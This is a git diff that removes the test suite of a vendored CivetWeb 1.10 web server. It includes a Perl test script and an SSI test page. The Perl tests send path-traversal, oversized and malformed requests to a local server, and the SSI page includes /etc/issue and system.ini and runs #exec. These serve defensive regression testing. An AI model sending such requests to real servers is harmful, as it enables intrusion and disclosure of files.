-        mg.write("<body>Resource of type \"" .. mime .. "\" deleted.</body></html>\r\n")

-    else

-        mime = mg.get_mime_type(file)

-        mg.write("HTTP/1.0 404 Not Found\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" not found.</body></html>\r\n")

-    end

-    return

-end

-

--- Any other method

-mg.write("HTTP/1.0 405 Method Not Allowed\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/html; charset=utf-8\r\n")

-mg.write("\r\n")

-mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-mg.write("<body>Method not allowed.</body></html>\r\n")

-

diff --git a/thirdparty/civetweb-1.10/test/shared.c b/thirdparty/civetweb-1.10/test/shared.c
deleted file mode 100644
index a35a863..0000000
--- a/thirdparty/civetweb-1.10/test/shared.c
+++ /dev/null
@@ -1,48 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#ifdef _MSC_VER
-#if !defined(_CRT_SECURE_NO_WARNINGS)
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#if !defined(_CRT_SECURE_NO_DEPRECATE)
-#define _CRT_SECURE_NO_DEPRECATE
-#endif
-#endif
-
-#include "shared.h"
-#include <string.h>
-
-static char s_test_directory[1024] = {'\0'};
-
-const char *
-get_test_directory(void)
-{
-	return s_test_directory;
-}
-
-void
-set_test_directory(const char *const path)
-{
-	strncpy(s_test_directory,
-	        path,
-	        sizeof(s_test_directory) / sizeof(s_test_directory[0]));
-}
diff --git a/thirdparty/civetweb-1.10/test/shared.h b/thirdparty/civetweb-1.10/test/shared.h
deleted file mode 100644
index 937fcff..0000000
--- a/thirdparty/civetweb-1.10/test/shared.h
+++ /dev/null
@@ -1,27 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_SHARED_H_
-#define TEST_SHARED_H_
-
-const char *get_test_directory(void);
-void set_test_directory(const char *const path);
-
-#endif /* TEST_SHARED_H_ */
diff --git a/thirdparty/civetweb-1.10/test/ssi_test.shtml b/thirdparty/civetweb-1.10/test/ssi_test.shtml
deleted file mode 100644
index eb03d17..0000000
--- a/thirdparty/civetweb-1.10/test/ssi_test.shtml
+++ /dev/null
@@ -1,37 +0,0 @@
-<!doctype html>
-<html lang="en">
-<head>
-  <meta charset="utf-8">
-  <title>The HTML5 Herald</title>
-  <meta name="author" content="CivetWeb developers">
-  <meta name="description" content="CivetWeb Server Side Include (SSI) Test Page">
-</head>
-
-<body>
-  <h1>CivetWeb Server Side Include (SSI) Test Page</h1>
-  <p>Note: Some of the tests below will only work on Windows, others only on Linux, and some probably not on all Linux distributions and all Windows versions.</p>
-
-  <h2>Execute: "cd"</h2>
-  <!--#exec "cd" -->
-  <h2>Execute: "pwd"</h2>
-  <!--#exec "pwd" -->
-
-  <h2>File relative to current document: "hello.txt"</h2>
-  <!--#include file="hello.txt" -->
-  <h2>Short form: "hello.txt"</h2>
-  <!--#include "hello.txt" -->
-
-  <h2>File relative to document root: "hello.txt"</h2>
-  <!--#include virtual="hello.txt" -->
-
-  <h2>File with absolute path: "C:\Windows\system.ini"</h2>
-  <!--#include abspath="C:\Windows\system.ini" -->
-  <h2>File with absolute path: "/etc/issue"</h2>
-  <!--#include abspath="/etc/issue" -->
-
-  <h2>Nested file relative to current documentt: "hello.shtml"</h2>
-  <!--#include file="./hello.shtml" -->
-
-</body>
-</html>
-
diff --git a/thirdparty/civetweb-1.10/test/syntax_error.ssjs b/thirdparty/civetweb-1.10/test/syntax_error.ssjs
deleted file mode 100644
index d8619ed..0000000
--- a/thirdparty/civetweb-1.10/test/syntax_error.ssjs
+++ /dev/null
@@ -1,7 +0,0 @@
-

-conn.write('HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n');

-

-conn.write('Syntax error:');

-

-asdf ghjk qwert 123456789 +-*/

-.!,;

diff --git a/thirdparty/civetweb-1.10/test/test.ico b/thirdparty/civetweb-1.10/test/test.ico
deleted file mode 100644
index 70ab89d..0000000
--- a/thirdparty/civetweb-1.10/test/test.ico
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/test.pl b/thirdparty/civetweb-1.10/test/test.pl
deleted file mode 100755
index e503489..0000000
--- a/thirdparty/civetweb-1.10/test/test.pl
+++ /dev/null
@@ -1,461 +0,0 @@
-#!/usr/bin/env perl
-# This script is used to test Civetweb web server
-
-use IO::Socket;
-use File::Path;
-use Cwd;
-use strict;
-use warnings;
-#use diagnostics;
-
-sub on_windows { $^O =~ /win32/i; }
-
-my $port = 23456;
-my $pid = undef;
-my $num_requests;
-my $dir_separator = on_windows() ? '\\' : '/';
-my $copy_cmd = on_windows() ? 'copy' : 'cp';
-my $test_dir_uri = "test_dir";
-my $root = 'test';
-my $test_dir = $root . $dir_separator. $test_dir_uri;
-my $config = 'civetweb.conf';
-my $exe_ext = on_windows() ? '.exe' : '';
-my $civetweb_exe = '.' . $dir_separator . 'civetweb' . $exe_ext;
-my $embed_exe = '.' . $dir_separator . 'embed' . $exe_ext;
-my $unit_test_exe = '.' . $dir_separator . 'unit_test' . $exe_ext;
-my $exit_code = 0;
-
-my @files_to_delete = ('debug.log', 'access.log', $config, "$root/a/put.txt",
-  "$root/a+.txt", "$root/.htpasswd", "$root/binary_file", "$root/a",
-  "$root/myperl", $embed_exe, $unit_test_exe);
-
-END {
-  unlink @files_to_delete;
-  kill_spawned_child();
-  File::Path::rmtree($test_dir);
-  exit $exit_code;
-}
-
-sub fail {
-  print "FAILED: @_\n";
-  $exit_code = 1;
-  exit 1;
-}
-
-sub get_num_of_log_entries {
-  open FD, "access.log" or return 0;
-  my @lines = (<FD>);
-  close FD;
-  return scalar @lines;
-}
-
-# Send the request to the 127.0.0.1:$port and return the reply
-sub req {
-  my ($request, $inc, $timeout) = @_;
-  my $sock = IO::Socket::INET->new(Proto => 6,
-    PeerAddr => '127.0.0.1', PeerPort => $port);
-  fail("Cannot connect to http://127.0.0.1:$port : $!") unless $sock;
-  $sock->autoflush(1);
-  foreach my $byte (split //, $request) {
-    last unless print $sock $byte;
-    select undef, undef, undef, .001 if length($request) < 256;
-  }
-  my ($out, $buf) = ('', '');
-  eval {
-    alarm $timeout if $timeout;
-    $out .= $buf while (sysread($sock, $buf, 1024) > 0);
-    alarm 0 if $timeout;
-  };
-  close $sock;
-
-  $num_requests += defined($inc) ? $inc : 1;
-  my $num_logs = get_num_of_log_entries();
-
-  unless ($num_requests == $num_logs) {
-    fail("Request has not been logged: [$request], output: [$out]");
-  }
-
-  return $out;
-}
-
-# Send the request. Compare with the expected reply. Fail if no match
-sub o {
-  my ($request, $expected_reply, $message, $num_logs) = @_;
-  print "==> $message ... ";
-  my $reply = req($request, $num_logs);
-  if ($reply =~ /$expected_reply/s) {
-    print "OK\n";
-  } else {
-#fail("Requested: [$request]\nExpected: [$expected_reply], got: [$reply]");
-    fail("Expected: [$expected_reply], got: [$reply]");
-  }
-}
-
-# Spawn a server listening on specified port
-sub spawn {
-  my ($cmdline) = @_;
-  print 'Executing: ', @_, "\n";
-  if (on_windows()) {
-    my @args = split /\s+/, $cmdline;
-    my $executable = $args[0];
-    Win32::Spawn($executable, $cmdline, $pid);
-    die "Cannot spawn @_: $!" unless $pid;
-  } else {
-    unless ($pid = fork()) {
-      exec $cmdline;
-      die "cannot exec [$cmdline]: $!\n";
-    }
-  }
-  sleep 1;
-}
-
-sub write_file {
-  open FD, ">$_[0]" or fail "Cannot open $_[0]: $!";
-  binmode FD;
-  print FD $_[1];
-  close FD;
-}
-
-sub read_file {
-  open FD, $_[0] or fail "Cannot open $_[0]: $!";
-  my @lines = <FD>;
-  close FD;
-  return join '', @lines;
-}
-
-sub kill_spawned_child {
-  if (defined($pid)) {
-    kill(9, $pid);
-    waitpid($pid, 0);
-  }
-}
-
-####################################################### ENTRY POINT
-
-unlink @files_to_delete;
-$SIG{PIPE} = 'IGNORE';
-$SIG{ALRM} = sub { die "timeout\n" };
-#local $| =1;
-
-# Make sure we export only symbols that start with "mg_", and keep local
-# symbols static.
-if ($^O =~ /darwin|bsd|linux/) {
-  my $out = `(cc -c src/civetweb.c && nm src/civetweb.o) | grep ' T '`;
-  foreach (split /\n/, $out) {
-    /T\s+_?mg_.+/ or fail("Exported symbol $_")
-  }
-}
-
-if (scalar(@ARGV) > 0 and $ARGV[0] eq 'unit') {
-  do_unit_test();
-  exit 0;
-}
-
-# Make sure we load config file if no options are given.
-# Command line options override config files settings
-write_file($config, "access_log_file access.log\n" .
-           "listening_ports 127.0.0.1:12345\n");
-spawn("$civetweb_exe -listening_ports 127.0.0.1:$port");
-o("GET /test/hello.txt HTTP/1.0\n\n", 'HTTP/1.1 200 OK', 'Loading config file');
-unlink $config;
-kill_spawned_child();
-
-# Spawn the server on port $port
-my $cmd = "$civetweb_exe ".
-  "-listening_ports 127.0.0.1:$port ".
-  "-access_log_file access.log ".
-  "-error_log_file debug.log ".
-  "-cgi_environment CGI_FOO=foo,CGI_BAR=bar,CGI_BAZ=baz " .
-  "-extra_mime_types .bar=foo/bar,.tar.gz=blah,.baz=foo " .
-  '-put_delete_auth_file test/passfile ' .
-  '-access_control_list -0.0.0.0/0,+127.0.0.1 ' .
-  "-document_root $root ".
-  "-hide_files_patterns **exploit.PL ".
-  "-enable_keep_alive yes ".
-  "-url_rewrite_patterns /aiased=/etc/,/ta=$test_dir";
-$cmd .= ' -cgi_interpreter perl' if on_windows();
-spawn($cmd);
-
-o("GET /hello.txt HTTP/1.1\nConnection: close\nRange: bytes=3-50\r\n\r\n",
-  'Content-Length: 15\s', 'Range past the file end');
-
-o("GET /hello.txt HTTP/1.1\n\n   GET /hello.txt HTTP/1.0\n\n",
-  'HTTP/1.1 200.+keep-alive.+HTTP/1.1 200.+close',
-  'Request pipelining', 2);
-
-my $x = 'x=' . 'A' x (200 * 1024);
-my $len = length($x);
-o("POST /env.cgi HTTP/1.0\r\nContent-Length: $len\r\n\r\n$x",
-  '^HTTP/1.1 200 OK', 'Long POST');
-
-# Try to overflow: Send very long request
-req('POST ' . '/..' x 100 . 'ABCD' x 3000 . "\n\n", 0); # don't log this one
-
-o("GET /hello.txt HTTP/1.0\n\n", 'HTTP/1.1 200 OK', 'GET regular file');
-o("GET /hello.txt HTTP/1.0\nContent-Length: -2147483648\n\n",
-  'HTTP/1.1 200 OK', 'Negative content length');
-o("GET /hello.txt HTTP/1.0\n\n", 'Content-Length: 17\s',
-  'GET regular file Content-Length');
-o("GET /%68%65%6c%6c%6f%2e%74%78%74 HTTP/1.0\n\n",
-  'HTTP/1.1 200 OK', 'URL-decoding');
-
-# Break CGI reading after 1 second. We must get full output.
-# Since CGI script does sleep, we sleep as well and increase request count
-# manually.
-my $slow_cgi_reply;
-print "==> Slow CGI output ... ";
-fail('Slow CGI output forward reply=', $slow_cgi_reply) unless
-  ($slow_cgi_reply = req("GET /timeout.cgi HTTP/1.0\r\n\r\n", 0, 1)) =~ /Some data/s;
-print "OK\n";
-sleep 3;
-$num_requests++;
-
-# '+' in URI must not be URL-decoded to space
-write_file("$root/a+.txt", '');
-o("GET /a+.txt HTTP/1.0\n\n", 'HTTP/1.1 200 OK', 'URL-decoding, + in URI');
-
-# Test HTTP version parsing
-o("GET / HTTPX/1.0\r\n\r\n", '^HTTP/1.1 500', 'Bad HTTP Version', 0);
-o("GET / HTTP/x.1\r\n\r\n", '^HTTP/1.1 505', 'Bad HTTP maj Version', 0);
-o("GET / HTTP/1.1z\r\n\r\n", '^HTTP/1.1 505', 'Bad HTTP min Version', 0);
-o("GET / HTTP/02.0\r\n\r\n", '^HTTP/1.1 505', 'HTTP Version >1.1', 0);
-
-# File with leading single dot
-o("GET /.leading.dot.txt HTTP/1.0\n\n", 'abc123', 'Leading dot 1');
-o("GET /...leading.dot.txt HTTP/1.0\n\n", 'abc123', 'Leading dot 2');
-o("GET /../\\\\/.//...leading.dot.txt HTTP/1.0\n\n", 'abc123', 'Leading dot 3')
-  if on_windows();
-o("GET .. HTTP/1.0\n\n", '400 Bad Request', 'Leading dot 4', 0);
-
-mkdir $test_dir unless -d $test_dir;
-o("GET /$test_dir_uri/not_exist HTTP/1.0\n\n",
-  'HTTP/1.1 404', 'PATH_INFO loop problem');
-o("GET /$test_dir_uri HTTP/1.0\n\n", 'HTTP/1.1 301', 'Directory redirection');
-o("GET /$test_dir_uri/ HTTP/1.0\n\n", 'Modified', 'Directory listing');
-write_file("$test_dir/index.html", "tralala");
-o("GET /$test_dir_uri/ HTTP/1.0\n\n", 'tralala', 'Index substitution');
-o("GET / HTTP/1.0\n\n", 'embed.c', 'Directory listing - file name');
-o("GET /ta/ HTTP/1.0\n\n", 'Modified', 'Aliases');
-o("GET /not-exist HTTP/1.0\r\n\n", 'HTTP/1.1 404', 'Not existent file');
-mkdir $test_dir . $dir_separator . 'x';
-my $path = $test_dir . $dir_separator . 'x' . $dir_separator . 'index.cgi';
-write_file($path, read_file($root . $dir_separator . 'env.cgi'));
-chmod(0755, $path);
-o("GET /$test_dir_uri/x/ HTTP/1.0\n\n", "Content-Type: text/html\r\n\r\n",
-  'index.cgi execution');
-
-my $cwd = getcwd();
-o("GET /$test_dir_uri/x/ HTTP/1.0\n\n",
-  "SCRIPT_FILENAME=$cwd/test/test_dir/x/index.cgi", 'SCRIPT_FILENAME');
-o("GET /ta/x/ HTTP/1.0\n\n", "SCRIPT_NAME=/ta/x/index.cgi",
-  'Aliases SCRIPT_NAME');
-o("GET /hello.txt HTTP/1.1\nConnection: close\n\n", 'Connection: close',
-  'No keep-alive');
-
-$path = $test_dir . $dir_separator . 'x' . $dir_separator . 'a.cgi';
-system("ln -s `which perl` $root/myperl") == 0 or fail("Can't symlink perl");
-write_file($path, "#!../../myperl\n" .
-           "print \"Content-Type: text/plain\\n\\nhi\";");
-chmod(0755, $path);
-o("GET /$test_dir_uri/x/a.cgi HTTP/1.0\n\n", "hi", 'Relative CGI interp path');
-o("GET * HTTP/1.0\n\n", "^HTTP/1.1 404", '* URI');
-
-my $mime_types = {
-  html => 'text/html',
-  htm => 'text/html',
-  txt => 'text/plain',
-  unknown_extension => 'text/plain',
-  js => 'application/x-javascript',
-  css => 'text/css',
-  jpg => 'image/jpeg',
-  c => 'text/plain',
-  'tar.gz' => 'blah',
-  bar => 'foo/bar',
-  baz => 'foo',
-};
-
-foreach my $key (keys %$mime_types) {
-  my $filename = "_mime_file_test.$key";
-  write_file("$root/$filename", '');
-  o("GET /$filename HTTP/1.0\n\n",
-    "Content-Type: $mime_types->{$key}", ".$key mime type");
-  unlink "$root/$filename";
-}
-
-# Get binary file and check the integrity
-my $binary_file = 'binary_file';
-my $f2 = '';
-foreach (0..123456) { $f2 .= chr(int(rand() * 255)); }
-write_file("$root/$binary_file", $f2);
-my $f1 = req("GET /$binary_file HTTP/1.0\r\n\n");
-while ($f1 =~ /^.*\r\n/) { $f1 =~ s/^.*\r\n// }
-$f1 eq $f2 or fail("Integrity check for downloaded binary file");
-
-my $range_request = "GET /hello.txt HTTP/1.1\nConnection: close\n".
-"Range: bytes=3-5\r\n\r\n";
-o($range_request, '206 Partial Content', 'Range: 206 status code');
-o($range_request, 'Content-Length: 3\s', 'Range: Content-Length');
-o($range_request, 'Content-Range: bytes 3-5/17', 'Range: Content-Range');
-o($range_request, '\nple$', 'Range: body content');
-
-# Test directory sorting. Sleep between file creation for 1.1 seconds,
-# to make sure modification time are different.
-mkdir "$test_dir/sort";
-write_file("$test_dir/sort/11", 'xx');
-select undef, undef, undef, 1.1;
-write_file("$test_dir/sort/aa", 'xxxx');
-select undef, undef, undef, 1.1;
-write_file("$test_dir/sort/bb", 'xxx');
-select undef, undef, undef, 1.1;
-write_file("$test_dir/sort/22", 'x');
-
-o("GET /$test_dir_uri/sort/?n HTTP/1.0\n\n",
-  '200 OK.+>11<.+>22<.+>aa<.+>bb<',
-  'Directory listing (name, ascending)');
-o("GET /$test_dir_uri/sort/?nd HTTP/1.0\n\n",
-  '200 OK.+>bb<.+>aa<.+>22<.+>11<',
-  'Directory listing (name, descending)');
-o("GET /$test_dir_uri/sort/?s HTTP/1.0\n\n",
-  '200 OK.+>22<.+>11<.+>bb<.+>aa<',
-  'Directory listing (size, ascending)');
-o("GET /$test_dir_uri/sort/?sd HTTP/1.0\n\n",
-  '200 OK.+>aa<.+>bb<.+>11<.+>22<',
-  'Directory listing (size, descending)');
-o("GET /$test_dir_uri/sort/?d HTTP/1.0\n\n",
-  '200 OK.+>11<.+>aa<.+>bb<.+>22<',
-  'Directory listing (modification time, ascending)');
-o("GET /$test_dir_uri/sort/?dd HTTP/1.0\n\n",
-  '200 OK.+>22<.+>bb<.+>aa<.+>11<',
-  'Directory listing (modification time, descending)');
-
-unless (scalar(@ARGV) > 0 and $ARGV[0] eq "basic_tests") {
-  # Check that .htpasswd file existence trigger authorization
-  write_file("$root/.htpasswd", 'user with space, " and comma:mydomain.com:5deda12442309cbdcdffc6b2737a894f');
-  o("GET /hello.txt HTTP/1.1\n\n", '401 Unauthorized',
-    '.htpasswd - triggering auth on file request');
-  o("GET / HTTP/1.1\n\n", '401 Unauthorized',
-    '.htpasswd - triggering auth on directory request');
-
-  # Test various funky things in an authentication header.
-  o("GET /hello.txt HTTP/1.0\nAuthorization: Digest   eq== empty=\"\", empty2=, quoted=\"blah foo bar, baz\\\"\\\" more\\\"\", unterminatedquoted=\" doesn't stop\n\n",
-    '401 Unauthorized', 'weird auth values should not cause crashes');
-  my $auth_header = "Digest username=\"user with space, \\\" and comma\", ".
-    "realm=\"mydomain.com\", nonce=\"1291376417\", uri=\"/\",".
-    "response=\"e8dec0c2a1a0c8a7e9a97b4b5ea6a6e6\", qop=auth, nc=00000001, cnonce=\"1a49b53a47a66e82\"";
-  o("GET /hello.txt HTTP/1.0\nAuthorization: $auth_header\n\n", 'HTTP/1.1 200 OK', 'GET regular file with auth');
-  o("GET / HTTP/1.0\nAuthorization: $auth_header\n\n", '^(.(?!(.htpasswd)))*$',
-    '.htpasswd is hidden from the directory list');
-  o("GET / HTTP/1.0\nAuthorization: $auth_header\n\n", '^(.(?!(exploit.pl)))*$',
-    'hidden file is hidden from the directory list');
-  o("GET /.htpasswd HTTP/1.0\nAuthorization: $auth_header\n\n",
-    '^HTTP/1.1 404 ', '.htpasswd must not be shown');
-  o("GET /exploit.pl HTTP/1.0\nAuthorization: $auth_header\n\n",
-    '^HTTP/1.1 404', 'hidden files must not be shown');
-  unlink "$root/.htpasswd";
-
-
-  o("GET /dir%20with%20spaces/hello.cgi HTTP/1.0\n\r\n",
-      'HTTP/1.1 200 OK.+hello', 'CGI script with spaces in path');
-  o("GET /env.cgi HTTP/1.0\n\r\n", 'HTTP/1.1 200 OK', 'GET CGI file');
-  o("GET /bad2.cgi HTTP/1.0\n\n", "HTTP/1.1 123 Please pass me to the client\r",
-    'CGI Status code text');
-  o("GET /sh.cgi HTTP/1.0\n\r\n", 'shell script CGI',
-    'GET sh CGI file') unless on_windows();
-  o("GET /env.cgi?var=HELLO HTTP/1.0\n\n", 'QUERY_STRING=var=HELLO',
-    'QUERY_STRING wrong');
-  o("POST /env.cgi HTTP/1.0\r\nContent-Length: 9\r\n\r\nvar=HELLO",
-    'var=HELLO', 'CGI POST wrong');
-  o("POST /env.cgi HTTP/1.0\r\nContent-Length: 9\r\n\r\nvar=HELLO",
-    '\x0aCONTENT_LENGTH=9', 'Content-Length not being passed to CGI');
-  o("GET /env.cgi HTTP/1.0\nMy-HdR: abc\n\r\n",
-    'HTTP_MY_HDR=abc', 'HTTP_* env');
-  o("GET /env.cgi HTTP/1.0\n\r\nSOME_TRAILING_DATA_HERE",
-    'HTTP/1.1 200 OK', 'GET CGI with trailing data');
-
-  o("GET /env.cgi%20 HTTP/1.0\n\r\n",
-    'HTTP/1.1 404', 'CGI Win32 code disclosure (%20)');
-  o("GET /env.cgi%ff HTTP/1.0\n\r\n",
-    'HTTP/1.1 404', 'CGI Win32 code disclosure (%ff)');
-  o("GET /env.cgi%2e HTTP/1.0\n\r\n",
-    'HTTP/1.1 404', 'CGI Win32 code disclosure (%2e)');
-  o("GET /env.cgi%2b HTTP/1.0\n\r\n",
-    'HTTP/1.1 404', 'CGI Win32 code disclosure (%2b)');
-  o("GET /env.cgi HTTP/1.0\n\r\n", '\nHTTPS=off\n', 'CGI HTTPS');
-  o("GET /env.cgi HTTP/1.0\n\r\n", '\nCGI_FOO=foo\n', '-cgi_env 1');
-  o("GET /env.cgi HTTP/1.0\n\r\n", '\nCGI_BAR=bar\n', '-cgi_env 2');
-  o("GET /env.cgi HTTP/1.0\n\r\n", '\nCGI_BAZ=baz\n', '-cgi_env 3');
-  o("GET /env.cgi/a/b/98 HTTP/1.0\n\r\n", 'PATH_INFO=/a/b/98\n', 'PATH_INFO');
-  o("GET /env.cgi/a/b/9 HTTP/1.0\n\r\n", 'PATH_INFO=/a/b/9\n', 'PATH_INFO');
-
-  # Check that CGI's current directory is set to script's directory
-  my $copy_cmd = on_windows() ? 'copy' : 'cp';
-  system("$copy_cmd $root" . $dir_separator .  "env.cgi $test_dir" .
-    $dir_separator . 'env.cgi');
-  o("GET /$test_dir_uri/env.cgi HTTP/1.0\n\n",
-    "CURRENT_DIR=.*$root/$test_dir_uri", "CGI chdir()");
-
-  # SSI tests
-  o("GET /ssi1.shtml HTTP/1.0\n\n",
-    'ssi_begin.+CFLAGS.+ssi_end', 'SSI #include file=');
-  o("GET /ssi2.shtml HTTP/1.0\n\n",
-    'ssi_begin.+Unit test.+ssi_end', 'SSI #include virtual=');
-  my $ssi_exec = on_windows() ? 'ssi4.shtml' : 'ssi3.shtml';
-  o("GET /$ssi_exec HTTP/1.0\n\n",
-    'ssi_begin.+Makefile.+ssi_end', 'SSI #exec');
-  my $abs_path = on_windows() ? 'ssi6.shtml' : 'ssi5.shtml';
-  my $word = on_windows() ? 'boot loader' : 'root';
-  o("GET /$abs_path HTTP/1.0\n\n",
-    "ssi_begin.+$word.+ssi_end", 'SSI #include abspath');
-  o("GET /ssi7.shtml HTTP/1.0\n\n",
-    'ssi_begin.+Unit test.+ssi_end', 'SSI #include "..."');
-  o("GET /ssi8.shtml HTTP/1.0\n\n",
-    'ssi_begin.+CFLAGS.+ssi_end', 'SSI nested #includes');
-
-  # Manipulate the passwords file
-  my $path = 'test_htpasswd';
-  unlink $path;
-  system("$civetweb_exe -A $path a b c") == 0
-    or fail("Cannot add user in a passwd file");
-  system("$civetweb_exe -A $path a b c2") == 0
-    or fail("Cannot edit user in a passwd file");
-  my $content = read_file($path);
-  $content =~ /^b:a:\w+$/gs or fail("Bad content of the passwd file");
-  unlink $path;
-
-  do_PUT_test();
-  kill_spawned_child();
-  do_unit_test();
-}
-
-sub do_PUT_test {
-  # This only works because civetweb currently doesn't look at the nonce.
-  # It should really be rejected...
-  my $auth_header = "Authorization: Digest  username=guest, ".
-  "realm=mydomain.com, nonce=1145872809, uri=/put.txt, ".
-  "response=896327350763836180c61d87578037d9, qop=auth, ".
-  "nc=00000002, cnonce=53eddd3be4e26a98\n";
-
-  o("PUT /a/put.txt HTTP/1.0\nContent-Length: 7\n$auth_header\n1234567",
-    "HTTP/1.1 201 OK", 'PUT file, status 201');
-  fail("PUT content mismatch")
-  unless read_file("$root/a/put.txt") eq '1234567';
-  o("PUT /a/put.txt HTTP/1.0\nContent-Length: 4\n$auth_header\nabcd",
-    "HTTP/1.1 200 OK", 'PUT file, status 200');
-  fail("PUT content mismatch")
-  unless read_file("$root/a/put.txt") eq 'abcd';
-  o("PUT /a/put.txt HTTP/1.0\n$auth_header\nabcd",
-    "HTTP/1.1 411 Length Required", 'PUT 411 error');
-  o("PUT /a/put.txt HTTP/1.0\nExpect: blah\nContent-Length: 1\n".
-    "$auth_header\nabcd",
-    "HTTP/1.1 417 Expectation Failed", 'PUT 417 error');
-  o("PUT /a/put.txt HTTP/1.0\nExpect: 100-continue\nContent-Length: 4\n".
-    "$auth_header\nabcd",
-    "HTTP/1.1 100 Continue.+HTTP/1.1 200", 'PUT 100-Continue');
-}
-
-sub do_unit_test {
-  my $target = on_windows() ? 'wi' : 'un';
-  system("make $target") == 0 or fail("Unit test failed!");
-}
-
-print "SUCCESS! All tests passed.\n";
diff --git a/thirdparty/civetweb-1.10/test/testclient.c b/thirdparty/civetweb-1.10/test/testclient.c
deleted file mode 100644
index 5cc2edb..0000000
--- a/thirdparty/civetweb-1.10/test/testclient.c
+++ /dev/null
@@ -1,151 +0,0 @@
-#include <stdio.h>
-#include <time.h>
-
-#if defined(_WIN32) || defined(WIN32) 
-#include <windows.h>
-void INIT(void) {WSADATA wsaData; WSAStartup(MAKEWORD(2,2), &wsaData);}
-#else
-#define INIT()
-#include <unistd.h>
-#include <netdb.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <netinet/in.h>
-#endif
-
-int connect_to_server(const struct sockaddr_in * serv_addr)
-{
-    int sockfd;
-
-    /* Create a socket */
-    sockfd = socket(AF_INET, SOCK_STREAM, 0);
-    if (sockfd < 0) {
-        perror("ERROR opening socket");
-        return -1;
-    }
-
-    /* Connect to the server */
-    if (connect(sockfd, (const sockaddr *)serv_addr, sizeof(*serv_addr)) < 0) {
-         perror("ERROR connecting");
-         close(sockfd);
-         return -2;
-    }
-
-    return sockfd;
-}
-
-int send_to_server(int conn, const char * request)
-{
-    int req_len = strlen(request);
-    int n;
-
-    n = write(conn, request, req_len);
-    if (n < 0) {
-         perror("ERROR writing to socket");
-         return 0;
-    }
-
-    return (n==req_len);
-}
-
-int read_from_server(int conn)
-{
-    char rbuffer[1024];
-    int n;
-    long ret;
-
-    n = read(conn, rbuffer, sizeof(rbuffer));
-    if (n < 0) {
-         perror("ERROR reading from socket");
-         return 0;
-    }
-
-    if (strncmp("HTTP/1.", rbuffer, 7)) {
-         perror("ERROR not a HTTP response");
-         return 0;
-    }
-
-    ret = atol(rbuffer + 9);
-
-    return ret;
-}
-
-
-int main(int argc, char *argv[])
-{
-    long portno;
-    int i, con_count=1;
-    time_t t1,t2,t3,t4;
-    char wbuffer[256];
-    int connlist[1024*65];
-    int result[1024*65];
-    struct hostent *server;
-    struct sockaddr_in serv_addr;
-
-    INIT();
-
-    if (argc != 4) {
-        fprintf(stderr,"Usage:\n\t%s hostname port clients\n\n", argv[0]);
-        exit(0);
-    }
-
-    con_count = atol(argv[3]);
-    if (con_count<1) con_count=1;
-    if (con_count>1024*65) con_count=1024*65;
-
-    portno = atol(argv[2]);
-    if (portno<1l || portno>0xFFFFl) {
-        fprintf(stderr, "ERROR, invalid port\n");
-        exit(0);
-    }
-
-    server = gethostbyname(argv[1]);
-    if (server == NULL) {
-        fprintf(stderr, "ERROR, no such host\n");
-        exit(0);
-    }
-
-    memset(&serv_addr, 0, sizeof(serv_addr));
-    serv_addr.sin_family = AF_INET;
-    memcpy(server->h_addr, &serv_addr.sin_addr.s_addr, server->h_length);
-    serv_addr.sin_port = htons((short)portno);
-
-    sprintf(wbuffer, "GET / HTTP/1.0\r\n\r\n");
-
-    t1 = time(0);
-    for (i=0;i<con_count;i++) {
-        result[i] = connlist[i] = connect_to_server(&serv_addr);
-    }
-    t2 = time(0);
-    for (i=0;i<con_count;i++) {
-        if (result[i]>=0) {
-            result[i] = send_to_server(connlist[i], wbuffer);
-        }
-    }
-    t3 = time(0);
-    for (i=0;i<con_count;i++) {
-        if (result[i]>=0) {
-            result[i] = read_from_server(connlist[i]);
-        }
-    }
-    t4 = time(0);
-
-    printf("\n");
